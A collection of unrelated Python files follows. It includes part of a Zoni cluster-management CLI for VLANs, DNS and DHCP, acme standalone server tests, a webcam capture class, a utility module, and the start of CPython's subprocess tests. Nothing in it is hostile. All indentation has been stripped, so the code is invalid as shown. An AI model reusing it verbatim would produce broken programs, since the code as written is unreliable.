# Create a new vlan on all switches and add to db
if options.createVlanId:
print options.createVlanId
hwswitch.createVlans(options.createVlanId, data.getAllSwitches(), data)
data.addVlan(options.createVlanId, string.join(args[1:len(args)]))
# Remove vlan on all switches and remove from db
if options.destroyVlanId:
hwswitch.removeVlans(options.destroyVlanId, data.getAllSwitches(), data)
data.removeVlan(options.destroyVlanId)
if options.add2Vlan and (options.nodeName or options.switchPort):
tag="untagged"
vlan = options.add2Vlan
if ":" in options.add2Vlan:
print options.add2Vlan
vlan = options.add2Vlan.split(":")[0]
tag = options.add2Vlan.split(":")[1]
hwswitch.addNodeToVlan(vlan, tag)
data.addNodeToVlan(host['location'], vlan, tag)
exit()
if options.removeFromVlan and (options.nodeName or options.switchPort):
hwswitch.removeNodeFromVlan(options.removeFromVlan)
data.removeNodeFromVlan(options.nodeName, options.removeFromVlan)
if options.setNative and (options.nodeName or options.switchPort):
hwswitch.setNativeVlan(options.setNative)
data.addNodeToVlan(host['location'], options.setNative, "native")
if options.restoreNative and options.nodeName:
hwswitch.restoreNativeVlan()
if options.removeAllVlans and (options.nodeName or options.switchPort):
hwswitch.removeAllVlans()
if options.sendSwitchCommand and (options.nodeName or options.switchPort):
hwswitch.sendSwitchCommand(options.sendSwitchCommand)
if options.interactiveSwitchConfig:
hwswitch.interactiveSwitchConfig()
if options.showSwitchConfig and (options.nodeName or options.switchPort):
hwswitch.showInterfaceConfig()
# Register hardware
if options.register:
supported_hardware = ['dellswitch', 'raritan']
if len(args) < 3:
mesg = "ERROR: Expecting username and ip address of hardware to be registered\n"
mesg += os.path.basename(sys.argv[0]) + " --register HARDWARE username ipaddr\n"
mesg += "Supported hardware " + str(supported_hardware) + "\n"
sys.stderr.write(mesg)
else:
if string.lower(args[0]) == "dellswitch":
HwSwitch = HwDellSwitch
hw = HwSwitch(configs)
elif string.lower(args[0]) == "raritan":
hw = raritanDominionPx(configs)
else:
mesg = "Undefined hardware type\nSupported Hardware" + str(supported_hardware) + "\n"
sys.stderr.write(mesg)
exit()
if options.verbosity:
hw.setVerbose(True)
print args
password = getpass.getpass()
data = hw.registerToZoni(args[1], password, args[2])
# Register to DB
#data.registerHardware(data)
# Zoni Helper
if options.addDns or options.removeDns or options.addDhcp or options.removeDhcp or options.addCname or options.removeCname:
if options.addDns:
thisone = "--addDns"
if options.removeDns:
thisone = "--removeDns"
if options.removeDhcp:
thisone = "--removeDhcp"
if options.addDhcp:
thisone = "--addDhcp"
if options.addCname:
thisone = "--addCname"
if options.removeCname:
thisone = "--removeCname"
if options.addDns:
if len(args) < 2:
mesg = "ERROR: Incorrect number of arguments\n"
mesg += "Example: " + os.path.basename(sys.argv[0]) + " " + thisone + " hostname IP_Address\n"
print mesg
exit()
hostName = args[0]
ip = args[1]
if validIp(ip):
mesg = "Adding DNS entry: %s (%s) " % (hostName, ip)
sys.stdout.write(mesg)
dhcpdns = DhcpDns(configs, verbose=options.verbosity)
dhcpdns.addDns(hostName, ip)
try:
socket.gethostbyname(hostName)
sys.stdout.write("[Success]\n")
except Exception:
sys.stdout.write("[Fail]\n")
else:
mesg = "ERROR: Malformed IP Address\n"
mesg += "Use the dotted quad notation, e.g. 10.0.0.10\n"
print mesg
exit()
if options.removeDns or options.removeDhcp or options.removeCname:
if len(args) < 1:
mesg = "ERROR: Incorrect number of arguments\n"
mesg += "Example: " + os.path.basename(sys.argv[0]) + " " + thisone + " hostname\n"
sys.stdout.write(mesg)
exit()
hostName = args[0]
dhcpdns = DhcpDns(configs, verbose=options.verbosity)
if options.removeDns:
mesg = "Removing DNS entry: %s " % (hostName)
sys.stdout.write(mesg)
dhcpdns.removeDns(hostName)
try:
socket.gethostbyname(hostName)
sys.stdout.write("[Fail]\n")
except Exception:
sys.stdout.write("[Success]\n")
if options.removeDhcp:
dhcpdns.removeDhcp(hostName)
if options.removeCname:
mesg = "Removing DNS CNAME entry: %s " % (hostName)
sys.stdout.write(mesg)
dhcpdns.removeCname(hostName)
if dhcpdns.error:
mesg = "[FAIL] " + str(dhcpdns.error) + "\n"
sys.stdout.write(mesg)
else:
mesg = "[SUCCESS]" + "\n"
sys.stdout.write(mesg)
if options.addDhcp:
if len(args) < 3:
mesg = "ERROR: Incorrect number of arguments\n"
mesg += "Example: " + os.path.basename(sys.argv[0]) + " " + thisone + " hostname IP_Address Mac_Address\n"
print mesg
exit()
hostName = args[0]
ip = args[1]
mac = args[2]
if validIp(ip) and validMac(mac):
dhcpdns = DhcpDns(configs, verbose=options.verbosity)
dhcpdns.addDhcp(hostName, ip, mac)
if dhcpdns.error:
mesg = "ERROR: Add DHCP Error " + dhcpdns.error + "\n"
else:
if not validIp(ip):
mesg = "ERROR: Malformed IP Address\n"
mesg += "Use the dotted quad notation, e.g. 10.0.0.10\n"
print mesg
exit()
if not validMac(mac):
mesg = "ERROR: Malformed MAC Address\n"
mesg += "Example 10:20:30:40:50:60\n"
print mesg
exit()
if options.addCname:
if len(args) < 2:
mesg = "ERROR: Incorrect number of arguments\n"
mesg += "Example: %s %s cname existing_name" % (os.path.basename(sys.argv[0]), thisone)
print mesg
exit()
hostName = args[1]
cname = args[0]
mesg = "Adding DNS CNAME entry: %s -> %s " % (cname, hostName)
sys.stdout.write(mesg)
dhcpdns = DhcpDns(configs, verbose=options.verbosity)
dhcpdns.addCname(cname, hostName)
if dhcpdns.error:
mesg = "[FAIL] \n %s\n" % str(dhcpdns.error)
sys.stdout.write(mesg)
else:
mesg = "[SUCCESS]\n"
sys.stdout.write(mesg)
## Extensions from MIMOS - functions are defined in m_extensions.py
if ( options.addRole and options.nodeName ) or ( options.removeRole and options.nodeName ):
if options.addRole:
mimos.assignRoletoHost(host,options.addRole)
mimos.addRoletoNode(configs,host,options.nodeName,options.addRole)
if options.removeRole:
mimos.unassignRolefromHost(host)
mimos.removeRolefromNode(configs,host,options.nodeName)
if ( options.addRole and not options.nodeName ) or ( options.removeRole and not options.nodeName ):
mesg = "Roles: Missing Parameter(s)!"
log.error(mesg)
if options.showRoleMap:
mimos.showRoletoHost(configs)
if options.showKernelInfo:
mimos.showKernelInfo()
if options.showInitrdInfo:
mimos.showInitrdInfo()
if options.registerKernelInitrd:
mimos.registerKernelInitrd(configs,options.registerKernelInitrd)
if options.getKernelInitrdID:
mimos.getKernelInitrdID(options.getKernelInitrdID)
if options.getConfig:
mimos.getConfig(configs,options.getConfig)
if __name__ == "__main__":
main()
|
standalone_test.py
|
"""Tests for acme.standalone."""
import socket
import threading
import unittest
from unittest import mock
import josepy as jose
import requests
from six.moves import http_client # pylint: disable=import-error
from six.moves import socketserver # type: ignore # pylint: disable=import-error
from acme import challenges
from acme import crypto_util
from acme import errors
import test_util
class TLSServerTest(unittest.TestCase):
"""Tests for acme.standalone.TLSServer."""
def test_bind(self): # pylint: disable=no-self-use
from acme.standalone import TLSServer
server = TLSServer(
('', 0), socketserver.BaseRequestHandler, bind_and_activate=True)
server.server_close()
def test_ipv6(self):
if socket.has_ipv6:
from acme.standalone import TLSServer
server = TLSServer(
('', 0), socketserver.BaseRequestHandler, bind_and_activate=True, ipv6=True)
server.server_close()
class HTTP01ServerTest(unittest.TestCase):
"""Tests for acme.standalone.HTTP01Server."""
def setUp(self):
self.account_key = jose.JWK.load(
test_util.load_vector('rsa1024_key.pem'))
self.resources = set() # type: Set
from acme.standalone import HTTP01Server
self.server = HTTP01Server(('', 0), resources=self.resources)
self.port = self.server.socket.getsockname()[1]
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.start()
def tearDown(self):
self.server.shutdown()
self.thread.join()
def test_index(self):
response = requests.get(
'http://localhost:{0}'.format(self.port), verify=False)
self.assertEqual(
response.text, 'ACME client standalone challenge solver')
self.assertTrue(response.ok)
def test_404(self):
response = requests.get(
'http://localhost:{0}/foo'.format(self.port), verify=False)
self.assertEqual(response.status_code, http_client.NOT_FOUND)
def _test_http01(self, add):
chall = challenges.HTTP01(token=(b'x' * 16))
response, validation = chall.response_and_validation(self.account_key)
from acme.standalone import HTTP01RequestHandler
resource = HTTP01RequestHandler.HTTP01Resource(
chall=chall, response=response, validation=validation)
if add:
self.resources.add(resource)
return resource.response.simple_verify(
resource.chall, 'localhost', self.account_key.public_key(),
port=self.port)
def test_http01_found(self):
self.assertTrue(self._test_http01(add=True))
def test_http01_not_found(self):
self.assertFalse(self._test_http01(add=False))
def test_timely_shutdown(self):
from acme.standalone import HTTP01Server
server = HTTP01Server(('', 0), resources=set(), timeout=0.05)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
client = socket.socket()
client.connect(('localhost', server.socket.getsockname()[1]))
stop_thread = threading.Thread(target=server.shutdown)
stop_thread.start()
server_thread.join(5.)
is_hung = server_thread.is_alive()
try:
client.shutdown(socket.SHUT_RDWR)
except: # pragma: no cover, pylint: disable=bare-except
# may raise error because socket could already be closed
pass
self.assertFalse(is_hung, msg='Server shutdown should not be hung')
@unittest.skipIf(not challenges.TLSALPN01.is_supported(), "pyOpenSSL too old")
class TLSALPN01ServerTest(unittest.TestCase):
"""Test for acme.standalone.TLSALPN01Server."""
def setUp(self):
self.certs = {b'localhost': (
test_util.load_pyopenssl_private_key('rsa2048_key.pem'),
test_util.load_cert('rsa2048_cert.pem'),
)}
# Use different certificate for challenge.
self.challenge_certs = {b'localhost': (
test_util.load_pyopenssl_private_key('rsa4096_key.pem'),
test_util.load_cert('rsa4096_cert.pem'),
)}
from acme.standalone import TLSALPN01Server
self.server = TLSALPN01Server(("localhost", 0), certs=self.certs,
challenge_certs=self.challenge_certs)
# pylint: disable=no-member
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.start()
def tearDown(self):
self.server.shutdown() # pylint: disable=no-member
self.thread.join()
# TODO: This is not implemented yet, see comments in standalone.py
# def test_certs(self):
# host, port = self.server.socket.getsockname()[:2]
# cert = crypto_util.probe_sni(
# b'localhost', host=host, port=port, timeout=1)
# # Expect normal cert when connecting without ALPN.
# self.assertEqual(jose.ComparableX509(cert),
# jose.ComparableX509(self.certs[b'localhost'][1]))
def test_challenge_certs(self):
host, port = self.server.socket.getsockname()[:2]
cert = crypto_util.probe_sni(
b'localhost', host=host, port=port, timeout=1,
alpn_protocols=[b"acme-tls/1"])
# Expect challenge cert when connecting with ALPN.
self.assertEqual(
jose.ComparableX509(cert),
jose.ComparableX509(self.challenge_certs[b'localhost'][1])
)
def test_bad_alpn(self):
host, port = self.server.socket.getsockname()[:2]
with self.assertRaises(errors.Error):
crypto_util.probe_sni(
b'localhost', host=host, port=port, timeout=1,
alpn_protocols=[b"bad-alpn"])
class BaseDualNetworkedServersTest(unittest.TestCase):
"""Test for acme.standalone.BaseDualNetworkedServers."""
class SingleProtocolServer(socketserver.TCPServer):
"""Server that only serves on a single protocol. FreeBSD has this behavior for AF_INET6."""
def __init__(self, *args, **kwargs):
ipv6 = kwargs.pop("ipv6", False)
if ipv6:
self.address_family = socket.AF_INET6
kwargs["bind_and_activate"] = False
else:
self.address_family = socket.AF_INET
socketserver.TCPServer.__init__(self, *args, **kwargs)
if ipv6:
# NB: On Windows, socket.IPPROTO_IPV6 constant may be missing.
# We use the corresponding value (41) instead.
level = getattr(socket, "IPPROTO_IPV6", 41)
self.socket.setsockopt(level, socket.IPV6_V6ONLY, 1)
try:
self.server_bind()
self.server_activate()
except:
self.server_close()
raise
@mock.patch("socket.socket.bind")
def test_fail_to_bind(self, mock_bind):
mock_bind.side_effect = socket.error
from acme.standalone import BaseDualNetworkedServers
self.assertRaises(socket.error, BaseDualNetworkedServers,
BaseDualNetworkedServersTest.SingleProtocolServer,
('', 0),
socketserver.BaseRequestHandler)
def test_ports_equal(self):
from acme.standalone import BaseDualNetworkedServers
servers = BaseDualNetworkedServers(
BaseDualNetworkedServersTest.SingleProtocolServer,
('', 0),
socketserver.BaseRequestHandler)
socknames = servers.getsocknames()
prev_port = None
# assert ports are equal
for sockname in socknames:
port = sockname[1]
if prev_port:
self.assertEqual(prev_port, port)
prev_port = port
class HTTP01DualNetworkedServersTest(unittest.TestCase):
"""Tests for acme.standalone.HTTP01DualNetworkedServers."""
def setUp(self):
self.account_key = jose.JWK.load(
test_util.load_vector('rsa1024_key.pem'))
self.resources = set() # type: Set
from acme.standalone import HTTP01DualNetworkedServers
self.servers = HTTP01DualNetworkedServers(('', 0), resources=self.resources)
self.port = self.servers.getsocknames()[0][1]
self.servers.serve_forever()
def tearDown(self):
self.servers.shutdown_and_server_close()
def test_index(self):
response = requests.get(
'http://localhost:{0}'.format(self.port), verify=False)
self.assertEqual(
response.text, 'ACME client standalone challenge solver')
self.assertTrue(response.ok)
def test_404(self):
response = requests.get(
'http://localhost:{0}/foo'.format(self.port), verify=False)
self.assertEqual(response.status_code, http_client.NOT_FOUND)
def _test_http01(self, add):
chall = challenges.HTTP01(token=(b'x' * 16))
response, validation = chall.response_and_validation(self.account_key)
from acme.standalone import HTTP01RequestHandler
resource = HTTP01RequestHandler.HTTP01Resource(
chall=chall, response=response, validation=validation)
if add:
self.resources.add(resource)
return resource.response.simple_verify(
resource.chall, 'localhost', self.account_key.public_key(),
port=self.port)
def test_http01_found(self):
self.assertTrue(self._test_http01(add=True))
def test_http01_not_found(self):
self.assertFalse(self._test_http01(add=False))
if __name__ == "__main__":
unittest.main() # pragma: no cover
|
webcam.py
|
"""Raspberry Pi Face Recognition Treasure Box
Webcam OpenCV Camera Capture Device
Copyright 2013 Tony DiCola
Webcam device capture class using OpenCV. This class allows you to capture a
single image from the webcam, as if it were a snapshot camera.
This isn't used by the treasure box code out of the box, but is useful to have
if running the code on a PC where only a webcam is available. The interface is
the same as the picam.py capture class so it can be used in the box.py code
without any changes.
"""
import threading
import time
import cv2
# Rate at which the webcam will be polled for new images.
CAPTURE_HZ = 30.0
class OpenCVCapture(object):
def __init__(self, device_id=0):
"""Create an OpenCV capture object associated with the provided webcam
device ID.
"""
# Open the camera.
self._camera = cv2.VideoCapture(device_id)
if not self._camera.isOpened():
self._camera.open()
# Start a thread to continuously capture frames. This must be
# done because different layers of buffering in the webcam and
# OS drivers will cause you to retrieve old frames if they
# aren't continuously read.
self._capture_frame = None
# Use a lock to prevent access concurrent access to the camera.
self._capture_lock = threading.Lock()
self._capture_thread = threading.Thread(target=self._grab_frames)
self._capture_thread.daemon = True
self._capture_thread.start()
def _grab_frames(self):
while True:
retval, frame = self._camera.read()
with self._capture_lock:
self._capture_frame = None
if retval:
self._capture_frame = frame
time.sleep(1.0 / CAPTURE_HZ)
def read(self):
"""Read a single frame from the camera and return the data as an
OpenCV image (which is a numpy array).
"""
frame = None
with self._capture_lock:
frame = self._capture_frame
# If there are problems, keep retrying until an image can be read.
while frame is None:
time.sleep(0)
with self._capture_lock:
frame = self._capture_frame
# Return the capture image data.
return frame
def stop(self):
print("Terminating...")
|
utilit.py
|
# -*- coding: utf-8 -*-
__author__ = 'Akinava'
__author_email__ = 'akinava@gmail.com'
__copyright__ = 'Copyright © 2019'
__license__ = 'MIT License'
__version__ = [0, 0]
import json
import sys
from datetime import datetime
from time import time
import threading
import logging
import settings
import get_args
class Singleton(object):
def __new__(cls, *args, **kwargs):
if not hasattr(cls, '_instance'):
cls._instance = super(Singleton, cls).__new__(cls)
if hasattr(cls, '_initialized'):
cls.__init__ = cls.__skip_init__
if not hasattr(cls, '_initialized'):
cls._initialized = True
return cls._instance
def __skip_init__(self, *args, **kwargs):
return
class Stream:
def run_stream(self, target, **kwargs):
t = threading.Thread(target=target, kwargs=kwargs, daemon=True)
t.start()
def setup_logger():
settings.logger = logging.getLogger(__name__)
settings.logger.setLevel(settings.logging_level)
handler = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter(settings.logging_format)
handler.setFormatter(formatter)
settings.logger.addHandler(handler)
def update_obj(src, dst):
if isinstance(src, dict) and isinstance(dst, dict):
return update_dict(src, dst)
if isinstance(src, list) and isinstance(dst, list):
return update_list(src, dst)
return src
def debug_obj(obj):
if isinstance(obj, bytes):
return obj.hex()
if isinstance(obj, list):
return [debug_obj(item) for item in obj]
if isinstance(obj, dict):
return {k: debug_obj(v) for k, v in obj.items()}
return obj
def update_dict(src, dst):
for key, val in src.items():
dst[key] = update_obj(val, dst.get(key))
return dst
def update_list(src, dst):
return dst + src
def now():
return datetime.now().strftime(settings.DATA_FORMAT)
def check_border_with_over_flow(min, max, value):
if min < max:
return min < value < max
return value > min or max > value
def check_border_timestamp(timestamp):
return time() - settings.peer_ping_time_seconds < timestamp < time() + settings.peer_ping_time_seconds
def read_config_file():
with open(settings.config_file, 'r') as cfg_file:
return json.loads(cfg_file.read())
def import_config():
options, args = get_args.parser()
options_items = vars(options)
config = read_config_file()
for k, v in config.items():
if k in options_items and not getattr(options, k) is None:
continue
setattr(settings, k, v)
def import_options():
options, args = get_args.parser()
for key in vars(options):
value = getattr(options, key)
if value is None:
continue
setattr(settings, key, value)
def setup_settings():
setup_logger()
import_options()
import_config()
|
test_subprocess.py
|
import unittest
from unittest import mock
from test import support
import subprocess
import sys
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import traceback
import types
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
import json
from test.support import FakePath
try:
import _testcapi
except ImportError:
_testcapi = None
try:
import pwd
except ImportError:
pwd = None
try:
import grp
except ImportError:
grp = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
ZERO_RETURN_CMD = (sys.executable, '-c', 'pass')
def setUpModule():
shell_true = shutil.which('true')
if shell_true is None:
return
if (os.access(shell_true, os.X_OK) and
subprocess.run([shell_true]).returncode == 0):
global ZERO_RETURN_CMD
ZERO_RETURN_CMD = (shell_true,) # Faster than Python startup.
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
if not mswindows:
# subprocess._active is not used on Windows and is set to None.
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(
subprocess._active, "subprocess._active not empty"
)
self.doCleanups()
support.reap_children()
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call(ZERO_RETURN_CMD)
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
